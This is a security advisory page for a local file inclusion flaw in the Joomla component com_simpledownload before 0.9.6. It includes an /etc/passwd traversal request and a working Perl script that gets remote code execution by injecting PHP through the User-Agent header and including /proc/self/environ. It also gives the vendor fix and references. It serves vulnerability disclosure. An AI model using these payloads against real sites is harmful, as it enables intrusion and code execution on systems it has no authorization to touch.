Joomla component SimpleDownload Local File Inclusion

2010-06-02 / 2010-06-03
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--[Description]-- A vulnerability has been found in the downloader component for Joomla. It can be exploited in various ways - from sensitive information disclosure to remote code execution. Input passed to controller is not properly sanitized, allowing attacker to inject php code via Local File Inclusion combined with Directory Traversal (/proc/self/environ method) and Null Byte Injection, leading to Remote Code Execution. --[Vendor]-- http://joomla.joelrowley.com/ --[Vulnerable Version]-- com_simpledownload <0.9.6 --[Impact]-- Local File Inclusion Directory Traversal Remote Code Execution --[LFI Exploit]-- /index2.php?option=com_simpledownload&controller=[LFI]%00 --[LFI PoC]-- /index2.php?option=com_simpledownload&controller= ./../../../../../../../etc/passwd%00 --[RCE PoC]-- #!/usr/bin/perl -w # quick'n'dirty PoC for RCE # com_simpledownload <0.9.6 # by <sm0q> # usage eg.: # $./expl.pl -h localhost \ # -c "<?php passthru('uname -a > uname.txt'); ?>" use LWP::UserAgent; use Getopt::Std; my %o=(); getopts("c:h:",\%o); die "Usage: $0 -h target_host -c command\n" if ! (defined $o{h} && defined $o{c}); $o{h} =~ s/(http:\/\/)?(.*)/http:\/\/$2/; my $url="/index2.php?option=com_simpledownload&controller=../../../../../.. /../../../../../../../../../../../proc/self/environ%00"; my $lwp = LWP::UserAgent->new; print $lwp->get($o{h}.$url, 'User-Agent'=>"$o{c}")->decoded_content; --[Solution]-- Thanks to quick response from Joel Rowley fix released in version 0.9.6 - upgrade as soon as possible from: http://extensions.joomla.org/extensions/directory-a-documentation/downlo ads/10717 --[EOF]--

References:

http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10717
http://xforce.iss.net/xforce/xfdb/58625
http://www.securityfocus.com/bid/40192
http://www.securityfocus.com/archive/1/archive/1/511305/100/0/threaded
http://www.osvdb.org/64743
http://www.exploit-db.com/exploits/12618
http://secunia.com/advisories/39871
http://packetstormsecurity.org/1005-exploits/joomlasimpledownload-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top